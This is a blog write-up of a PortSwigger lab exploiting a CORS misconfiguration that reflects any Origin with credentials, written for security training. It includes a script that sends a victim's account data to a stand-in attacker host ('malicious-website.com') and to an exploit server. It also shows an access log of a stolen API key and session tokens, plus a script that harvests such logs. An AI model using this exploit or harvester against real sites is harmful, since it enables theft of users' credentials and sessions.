DEV Community

Christian Paez

Portswigger’s lab write up: CORS vulnerability with basic origin reflection

In this apprentice-level lab, we exploit a website with a basic CORS misconfiguration (the server reflects any Origin header and allows credentials) to obtain a logged-in user's API key.


After logging in with the given credentials, we visit the account details page and inspect the response headers of the request to /accountDetails that fetches the user's API key:

```
HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}
```

We can see that Access-Control-Allow-Credentials: true is present. Let's resend the request with the Origin header changed to something we control, for example Origin: https://example.com, and check whether that value is reflected. The response looks like this:

```
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://example.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149

{
  "username": "wiener",
  "email": "",
  "apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
  "sessions": [
    "cdmflpOO6psYIp3novWUytbSDM9i68X1"
  ]
}
```

The Origin we sent is reflected verbatim in the Access-Control-Allow-Origin response header, together with Access-Control-Allow-Credentials: true. That combination is the vulnerability: any site a logged-in user visits can make a credentialed cross-origin request to /accountDetails, and the browser will let that site read the response, API key included. Let's use the template from the reading material to craft our exploit:
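To make the check above concrete, here is an added example (not code from the lab or the original write-up) that models the server side and the tester's side of origin reflection. It contains a handler that reflects any Origin the way the lab's endpoint does, an allowlist-based replacement, and the classification a tester applies to a response to decide whether the reflection is exploitable. It also goes slightly beyond the lab by probing the literal "null" origin, which a sandboxed iframe can send. The origins and the allowlist are constructed for illustration.

```javascript
// Added example, not part of the original write-up. Origins and the allowlist
// below are constructed for illustration only.

// Vulnerable: echo whatever Origin the client sent and allow credentials.
// This is the behaviour the lab's /accountDetails endpoint exhibits.
function vulnerableCorsHeaders(requestOrigin) {
  if (requestOrigin === undefined) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened: only exact, scheme-qualified origins from a fixed allowlist are
// echoed; anything else gets no CORS headers at all, so the browser blocks
// the cross-origin read. Exact string comparison avoids prefix/suffix tricks.
function hardenedCorsHeaders(requestOrigin, allowlist) {
  if (!allowlist.has(requestOrigin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // caches must not serve one origin's headers to another
  };
}

// Tester's view: given the Origin we sent and the headers that came back,
// what does the browser let a page on that origin do with the response?
function classifyReflection(sentOrigin, headers) {
  const acao = headers['Access-Control-Allow-Origin'];
  const creds = headers['Access-Control-Allow-Credentials'] === 'true';
  if (acao === undefined) return 'not-allowed';
  if (acao === '*') {
    // "*" never combines with credentials: browsers reject the credentialed read.
    return creds ? 'wildcard-with-credentials-blocked' : 'wildcard-anonymous-only';
  }
  if (acao === sentOrigin) {
    // Reflected. With credentials, a page on sentOrigin can read the
    // authenticated response. Reflecting the literal "null" origin counts too,
    // because a sandboxed iframe sends Origin: null.
    return creds ? 'reflected-with-credentials' : 'reflected-without-credentials';
  }
  return 'not-allowed'; // a fixed, different origin was returned
}

// Probe helper: try the Origins a tester would send against a server
// implementation and return a map of origin -> classification.
function probe(serverHeadersFor) {
  const results = {};
  for (const origin of ['https://example.com', 'null', 'https://trusted.example']) {
    results[origin] = classifyReflection(origin, serverHeadersFor(origin));
  }
  return results;
}

const ALLOWLIST = new Set(['https://trusted.example']); // constructed
const vulnerable = probe(vulnerableCorsHeaders);
const hardened = probe((o) => hardenedCorsHeaders(o, ALLOWLIST));
console.log('vulnerable:', vulnerable);
console.log('hardened:  ', hardened);
```

Against the vulnerable handler every probed origin, including "null", comes back as reflected with credentials; against the allowlist only https://trusted.example does, which is by design since an attacker does not control that origin.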

```javascript
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://vulnerable-website.com/sensitive-victim-data', true);
req.withCredentials = true; // send the victim's cookies with the cross-origin request
req.send();

function reqListener() {
  // exfiltrate the response body to the attacker's server
  location = '//malicious-website.com/log?key=' + encodeURIComponent(this.responseText);
};
```

We have to modify our exploit to point at the vulnerable website's /accountDetails endpoint and our exploit server's /log endpoint. Wrapped in a <script> tag, the final exploit looks like this (the ${LAB_URL} and ${EXPLOIT_SERVER_URL} placeholders stand for the lab and exploit server URLs):

```html
<script>
  // ${LAB_URL} and ${EXPLOIT_SERVER_URL} are placeholders: replace them with the lab and exploit server URLs
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get', '${LAB_URL}/accountDetails', true);
  req.withCredentials = true; // include the victim's session cookie
  req.send();

  function reqListener() {
    location = '${EXPLOIT_SERVER_URL}/log?key=' + encodeURIComponent(this.responseText);
  };
</script>
```

After delivering this exploit to the victim, we can read their credentials in the exploit server's access log:

```
181.63.62.250 2022-12-07 03:10:36 +0000 "GET /log?key=%7B%0A%20%20%22username%22%3A%20%22wiener%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22OiwIQ3xcR32ilUvyyai9tSWuUnzjfrzp%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%228QJ2k8dqE1vVtNcHmZixScfFPDENAzvo%22%2C%0A%20%20%20%20%22JNIc4VJZlskPdwjcf2C0fAREYXnaNATt%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
```
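The log entry is just encodeURIComponent(responseText) in the key parameter, so the API key is recovered by reversing that step. The following added example (not part of the original write-up) parses exploit-server log lines and pulls the exfiltrated JSON back out, so a whole log can be reduced to the credentials it holds. The first sample line is the one shown above; the second, a non-hit, is constructed.

```javascript
// Added example, not part of the original write-up. SAMPLE_LOG_LINE is the
// entry the write-up shows; the second line fed to harvest() is constructed.

const SAMPLE_LOG_LINE =
  '181.63.62.250 2022-12-07 03:10:36 +0000 "GET /log?key=%7B%0A%20%20%22username%22%3A%20%22wiener%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22OiwIQ3xcR32ilUvyyai9tSWuUnzjfrzp%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%228QJ2k8dqE1vVtNcHmZixScfFPDENAzvo%22%2C%0A%20%20%20%20%22JNIc4VJZlskPdwjcf2C0fAREYXnaNATt%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"';

// Pull the request target out of the quoted request line ("GET /path HTTP/1.1").
function requestTarget(logLine) {
  const m = logLine.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Decode the "key" parameter back into the JSON object the victim's browser
// fetched. Returns null for lines that are not exfiltration hits.
function decodeExfil(logLine) {
  const target = requestTarget(logLine);
  if (target === null) return null;
  // The base URL is arbitrary; URL's query parsing does the percent-decoding.
  const url = new URL(target, 'http://exploit-server.invalid');
  if (url.pathname !== '/log') return null;
  const key = url.searchParams.get('key');
  if (key === null) return null;
  try {
    return JSON.parse(key);
  } catch (e) {
    return null; // someone hit /log with something that is not our payload
  }
}

// Reduce a whole log to the credentials it contains, one entry per hit.
function harvest(logText) {
  const out = [];
  for (const line of logText.split('\n')) {
    const data = decodeExfil(line);
    if (data && typeof data.apikey === 'string') {
      out.push({
        username: data.username,
        apikey: data.apikey,
        sessions: Array.isArray(data.sessions) ? data.sessions : [],
      });
    }
  }
  return out;
}

// Constructed second line: a request for the exploit page itself, not a hit.
const NON_HIT_LINE =
  '10.0.0.1 2022-12-07 03:11:00 +0000 "GET /exploit HTTP/1.1" 200 "User-Agent: curl/7.81.0"';

const hits = harvest(SAMPLE_LOG_LINE + '\n' + NON_HIT_LINE);
console.log(hits);
```

Running it yields one hit for user wiener with the API key and both session tokens from the log line, and the /exploit request is ignored.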

Check out this write-up on the Art Of Code: https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection/

Github: https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-basic-origin-reflection
